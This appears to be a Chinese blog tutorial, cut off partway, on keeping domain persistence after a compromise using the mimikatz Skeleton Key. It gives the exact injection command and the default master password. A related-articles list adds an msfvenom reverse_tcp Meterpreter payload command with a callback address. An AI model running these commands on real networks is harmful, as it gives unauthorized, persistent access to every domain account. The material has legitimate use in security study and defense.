[内网渗透]—权限维持
域权限维持
Skeleton Key(万能密码)
原理
当拿到域控权限后,使用mimikatz可以注入Skeleon Key,将 Skeleton Key 注入域控制器的 lsass.exe 进程,这样会在域内的所有账号中添加一个 Skeleton Key,而这个key是自己设定的所以可以随时共享访问。
PS:由于注入到lsass.exe进程中,所以每次关机后就不存在了,但一般在真正的域环境中,域控在很长一段时间内是不会重启的,因此可以作为权限维持的一种方式。
实验
1、在域控机器上输入命令将 Skeleton Key 注入域控制器的 lsass.exe 进程:
mimikatz.exe "privilege::debug" "misc::skeleton" exit
这个时候系统提示 Skeleton Key 已经注入成功,此时会在域内的所有账号中添加一个 Skeleton Key,其密码默认为:“mimikatz”。
2、建立与域控
[内网渗透]—权限维持相关推荐
- 内网渗透-----权限分析及防御
第四章 权限提升分析及防御 生成MSF木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.2 lport=1234 -f exe ...
- linux实验总结及心得_安全实验室 | 内网渗透—Linux权限维持技巧总结
在上一篇文章中我们介绍了内网渗透中Windows环境下进行权限维持(点击阅读)的方式,本期我们将视角集中在Linux系统中继续对内网渗透中的权限维持方式进行探索.Linux也是在内网渗透中很常见的操作 ...
- 内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)
内网安全:内网渗透.(拿到内网主机最高权限) 内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题.通过映射端口,让外网的电脑找到处于内 ...
- 内网渗透测试:Windows权限提升思路
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录 Windows系统内核溢 ...
- kali扫描内网ip_来,我们聊聊内网渗透!
文章来源:Admin Team 0x00 前言 前段时间再看 metasploit 和白帽子讲 Web 安全,就一直想自己搭个从 Web 端渗透进入内网的环境玩一下,不过因为不太懂计网的知识,拓扑图也 ...
- 红蓝对抗 linux内网渗透
目录 一.前言 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap ...
- 内网渗透测试:内网信息收集与上传下载
在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...
- 【内网渗透工具】炫彩蛇安装教程
点击查看[学习资料] Viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化. Viper基础功能已集成杀软绕过,内网隧道,文件管理,增强命令行等基础功能. Viper ...
- 【内网渗透】利用非常规手段突破安全策略上线CS
前言 本文为一篇利用非常规手段突破安全策略的内网渗透记录 [查看资料] 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 20 ...
最新文章
- 初识好朋友计算机课件,初识电脑朋友.ppt
- Qt Creator连接裸机设备
- 百度地图大数据告诉你一线城市真相
- Git教程学习总结(分享给热爱学习的你,团队的协作离不开你呀)
- linux桌面xfce美化_使用Xfce Linux桌面环境的8个理由
- * poj 1062 昂贵的礼物 dijkstra 枚举区间
- Google 正式抛弃 HTTP!
- JavaScript人脸检测的实现方法
- hdu5358 ( First One )数学+思维
- Linux下 PHP 安装ioncube扩展
- 开启Apache一直出现443端口被占用
- win10专业版 hyper-v 找不到
- UEFI Application
- timer延迟1us_STM32 Systick定时器在实现1us延时的问题与解决
- uniapp 微信小程序地图,在高德app、腾讯app、百度app、苹果地图app 中打开
- unity 3d如何隐藏物体
- vivado 2018.2官方下载
- Unity 修改场景中人型骨骼模型的骨骼旋转角度
- Arduino学习之二——舵机控制
- 算法系列之九:计算几何与图形学有关的几种常用算法(二)
热门文章
- Error Code: 1318. Incorrect number of arguments for PROCEDURE student.new_procedure; expected 0, got
- 达梦使用powerdesigner生成er模型图
- Flash打开其他外部EXE软件
- 北京十大it外包公司
- java 验证手机号码、电话号码(包括最新的电信、联通和移动号码) 1
- Cuckoo针对恶意软件自动化分析系统
- [转]如何学习《离散数学》?
- 鼠标移动到的地方一直往右移动的解决办法
- 3DCNN参数解析:2013-PAMI-3DCNN for Human Action Recognition
- cocos2d中遇到棱形组成的方块进行点击判断位置